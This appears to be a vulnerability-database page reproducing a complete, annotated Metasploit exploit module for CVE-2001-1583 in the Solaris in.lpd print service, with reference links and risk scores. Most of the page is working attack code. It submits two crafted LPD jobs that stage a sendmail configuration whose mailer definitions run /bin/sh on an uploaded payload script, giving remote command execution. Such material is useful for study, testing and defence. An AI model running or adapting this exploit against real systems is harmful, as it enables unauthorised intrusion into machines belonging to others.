
Solaris LPD - Command Execution (Metasploit)


Solaris LPD Command Execution: the in.lpd service allows arbitrary command execution on Solaris releases up to and including 8.0. The module uses an exploitation technique by Dino Dai Zovi.

Exploit DB
Solaris 8.0 LPD - Command Execution (Metasploit)
31 Aug 200100:00
exploitdb
canvas
Immunity Canvas: IN_LPD
31 Dec 200105:00
canvas
Packet Storm
Solaris LPD Command Execution
28 Oct 200900:00
packetstorm
Metasploit
Solaris LPD Command Execution
16 Jan 200602:59
metasploit
Tenable Nessus
Solaris in.lpd Crafted Job Request Arbitrary Remote Command Execution
3 Apr 200300:00
nessus
Cvelist
CVE-2001-1583
23 Sep 200723:00
cvelist
CVE
CVE-2001-1583
23 Sep 200723:00
cve
NVD
CVE-2001-1583
31 Dec 200105:00
nvd
##
# $Id: sendmail_exec.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Metasploit exploit module for CVE-2001-1583: command execution through the
# Solaris in.lpd print spooler. Two LPD "receive job" sessions are used: the
# first stages a control file, a mail configuration file and the payload
# script in the spool directory; the second submits a job whose control file
# points the spooler's mail invocation at that configuration, whose mailer
# definitions run the staged script with /bin/sh.
class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	# Registers the module metadata with the framework. The 'Payload' block
	# restricts the module to command ('cmd') payloads of at most 8192 bytes
	# with NOPs disabled, since the payload is delivered as a shell script
	# rather than as machine code.
	#
	# @param info [Hash] framework-supplied module info, merged via update_info
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris LPD Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Sun Solaris
				up to and including 8.0. This module uses a technique
				discovered by Dino Dai Zovi to exploit the flaw without
				needing to know the resolved name of the attacking system.
			},
			'Author'         => [ 'hdm', 'ddz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2001-1583'],
					[ 'OSVDB', '15131'],
					[ 'BID', '3274'],
				],
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 8192,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Aug 31 2001',
			'DefaultTarget' => 0))

		# Only the remote port is configurable; 515 is the standard LPD port.
		register_options(
			[
				Opt::RPORT(515)
			], self.class)
	end

	# Runs the two-stage job submission described at the top of the class and
	# then starts the payload handler. Returns early (without raising) when the
	# target rejects a job request or any of the uploaded files.
	def exploit

		# This is the temporary path created in the spool directory
		spath = "/var/spool/print"

		# The job ID is squashed down to three decimal digits
		# (pid modulo 1000); the current epoch time, packed big-endian and
		# hex-encoded (8 hex chars), is appended so each run gets a distinct id.
		jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# The control file, in RFC 1179 format: 'H' host name, 'P' user name,
		# 'f' a formatted file to print. The user field carries a quoted
		# "-C <spath>/<jid>mail.cf" argument, which is presumably passed through
		# to the mail program when the job is processed (see mailcf below);
		# the two 'f' lines list data file names.
		control =
			"H"+"metasploit\n"+
			"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
			"f"+"dfA"+jid+"config\n"+
			"f"+"dfA"+jid+"script\n"


		# The mail configuration file: a minimal sendmail-style configuration
		# (V8 syntax, judging by the file name and the -C flag above). The 'FX'
		# class line and the 'Mlocal' and 'Mprog' mailer definitions all invoke
		# /bin/sh on the staged script, so delivery through either mailer runs
		# the payload.
		mailcf =
			"V8\n"+
			"\n"+
			"Ou0\n"+
			"Og0\n"+
			"OL0\n"+
			"Oeq\n"+
			"OQX/tmp\n"+
			"\n"+
			"FX|/bin/sh #{spath}/#{jid}script\n"+
			"\n"+
			"S3\n"+
			"S0\n"+
			"R\+     #local \\@blah :blah\n"+
			"S1\n"+
			"S2\n"+
			"S4\n"+
			"S5\n"+
			"\n"+
			"Mlocal  P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
			"Mprog   P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"

		# Establish the first connection to the server
		# (connect(false): presumably not registered as the module's global
		# socket, since a second connection is opened later -- confirm against
		# the Tcp mixin)
		sock1 = connect(false)

		# Request a cascaded job: 0x02 is the LPD "receive a printer job"
		# command, followed by the queue name.
		sock1.put("\x02metasploit:framework\n")
		res = sock1.get_once
		if (not res)
			# NOTE(review): sock1 is left open on this return path.
			print_status("The target did not accept our job request command")
			return
		end

		# Stage the three files inside the first job. Subcommand 2 = receive
		# control file, 3 = receive data file (see send_file). send_file
		# returns nil on any rejection, which stops the chain at that point.
		print_status("Configuring the spool directory...")
		if !(
				send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
				send_file(sock1, 3, jid + "mail.cf", mailcf) and
				send_file(sock1, 3, jid + "script", payload.encoded)
			)
			sock1.close
			return
		end

		# Establish the second connection to the server
		sock2 = connect(false)

		# Request another cascaded job
		sock2.put("\x02localhost:metasploit\n")
		res = sock2.get_once
		if (not res)
			# NOTE(review): as on the first job-request failure above, the open
			# sockets are not closed on this return path, unlike the later one.
			print_status("The target did not accept our second job request command")
			return
		end

		# Submit the second job: the same control file plus the mail
		# configuration as its data file.
		print_status("Attempting to trigger the vulnerable call to the mail program...")
		if !(
				send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
				send_file(sock2, 3, "dfa" + jid + "config", mailcf)
			)
			sock1.close
			sock2.close
			return
		end

		sock1.close
		sock2.close

		# Kernel#select with no descriptor sets is used as a 60-second sleep,
		# giving the spooler time to process the job before the handler runs.
		print_status("Waiting up to 60 seconds for the payload to execute...")
		select(nil,nil,nil,60)

		# Hand off to the framework's payload handler.
		handler
	end

	# Uploads one file within an open LPD job.
	#
	# Sends the "<type><length> <name>\n" subcommand header, waits for a
	# single-byte 0x00 acknowledgement, sends the data followed by a NUL
	# terminator, and waits for a second 0x00 acknowledgement. Only the first
	# byte of each reply is examined.
	#
	# @param s    the connected socket for the job
	# @param type [Integer] LPD subcommand code (2 = control file, 3 = data file)
	# @param name [String] file name sent in the header
	# @param data [String] file contents (defaults to empty)
	# @return [true, nil] true once both acknowledgements were received,
	#   nil (bare return) after logging which step the target rejected
	def send_file(s, type, name, data='')

		s.put(type.chr + data.length.to_s + " " + name + "\n")
		res = s.get_once(1)
		if !(res and res[0,1] == "\x00")
			print_status("The target did not accept our control file command (#{name})")
			return
		end

		s.put(data)
		s.put("\x00")
		res = s.get_once(1)
		if !(res and res[0,1] == "\x00")
			print_status("The target did not accept our control file data (#{name})")
			return
		end

		# "%.4d" pads the byte count with leading zeros to at least four digits.
		print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
		return true
	end

end

6.7Medium risk
Vulners AI Score6.7
CVSS210
EPSS0.40886